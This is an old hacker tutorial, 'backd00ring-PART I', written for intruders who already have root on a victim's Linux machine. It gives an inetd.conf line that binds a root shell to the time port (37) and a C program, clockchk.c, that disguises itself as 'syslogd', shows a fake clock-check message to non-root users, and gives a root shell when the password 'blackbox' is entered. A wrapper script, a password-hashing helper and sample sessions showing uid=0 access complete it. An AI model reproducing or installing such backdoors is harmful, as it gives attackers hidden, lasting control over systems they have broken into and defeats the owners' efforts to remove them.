backd00ring-PART I CHAMPION radigy@geocities.com back doors, hacking, cracking, root before 4 years when I saw linux 4 the 1st time, I was wondering about the meaning of the word 'hacking', 'backdooring' and etc. Later I got the 'meaning' and now Im writing this staff about backdoors. Here I will not talk about how to get root access,making/using exploits or sniffing someone network. Before you start backdooring you must have root(admin) privillege on victim's machine(you can find more on how to get root, on www.rootshell.com, ftp.technotronic.com). When you got r00t you are the king of the machine and if you have enough brain, you can control victim's 4ever. For this reason you must make a little doors, which can give you access to the hacked OS, even the admins found that they are hacked. There are a lot of different types of backdoors, here I will explain TCP/IP port backdoor. The idea is to make one of the not so useable ports (like time,discard,chargen) to listen for incoming conections on which if you connect you will receive access with r00t ID. The simple way is to edit /etc/inetd.conf and to insert the following line: ------------------------------------------------------ time stream tcp nowait root /bin/sh sh -i ---------------------- cut here ---------------------- Next, you must restart your inetd: ------------------------------------------------------ killall -HUP inetd ---------------------- cut here ---------------------- Now you can try to connect on port 37(time), and you will recieve root shell. --- # telnet localhost 37 Trying 127.0.0.1... Connected to localhost. Escape character is '^]'. sh: no job control in this shell sh-2.02# id id uid=0(root) gid=0(root) sh-2.02# --- This method is verry simple and Im not advising u to use it. My solution about making port backdoor work 4 u is to protect the port with passw0rd. Here is a little C program which will be executed if you try to connect on given port number(in example on 37 port). The program will print the greeting message /etc/issue, and after that will wait for password(default password is 'blackbox' with default salts '6S'),if you type wrong password the conection will be terminated, otherwise you will be granted with root access. --------------------------------------------------------------- /* clockchk.c created by CHAMPION */ /* to comile: gcc clockchk.c -o /sbin/clockchk -lnsl -lcrypt -O6 -DCRYPT_PASS */ #include #include #include #include #include #define password "6Sx0frZdJoPOY" #define salts "6S" main(int argc, char *argv[]) { int i=0; char *s; if (getuid()==0) { bzero(argv[0],200); strcpy(*argv,"syslogd"); system("cat /etc/issue"); s=crypt(getpass(""),salts); if (!strcmp(s,password)) system("/bin/sh -i"); } else { printf("\nChecking system clock..."); for (;i<3;i++) sleep(1); printf("\nSystem clock is ok.\n"); } } ---------------------- cut here ---------------------- After you compile the program with: gcc clockchk.c -o /sbin/clockchk -lnsl -lcrypt -O6 -DCRYPT_PASS it will be placed in /sbin. Next insert this line in your /etc/inetd.conf ------------------------------------------------------ stream tcp nowait root /bin/sh sh /sbin/ccheck ---------------------- cut here ---------------------- where /sbin/ccheck is the name of bash script (type 'man bash' to see why you can't execute bin files directly from /bin/sh :)) ------------------------------------------------------ #!/bin/sh /sbin/clockchk ---------------------- cut here ---------------------- Place this script in /sbin/ccheck, after that make 'killall -HUP inetd', and try to conect to 37 port. You will be prompted for pass, type 'blackbox' and that's it. ---:)) # telnet localhost 37 Trying 127.0.0.1... Connected to localhost. Escape character is '^]'. Welcome to RH Linux 6.0 (i386). blackbox sh: no job control in this shell sh-2.02# id id uid=0(root) gid=0(root) groups=0(root),1(bin),14(uucp),15(shadow),16(dialout),65534(nogroup) sh-2.02# ---:)) The password used in clockchk.c is encrypted for security reasons, you can use this small program to encrypt your pass: ------------------------------------------------------- /* mkpass.c created by CHAMPION*/ #include #include #include #define salts "6S" main(int argc, char *argv[]) { if (argc!=2) {printf("\nUse: mkpass your_password\n");exit(0);} printf("\nEncrypted pass: %s\n",crypt(argv[1],salts)); } /* END */ ---------------------- cut here ---------------------- This is my simple solution, about using the TCP/IP port backdoor, you can enhanche it in your own way. There are also UDP port backdoors, but I will not comment them here. Thats all 4 now, any comments and suggestions send to: radigy@geocities.com champion <::>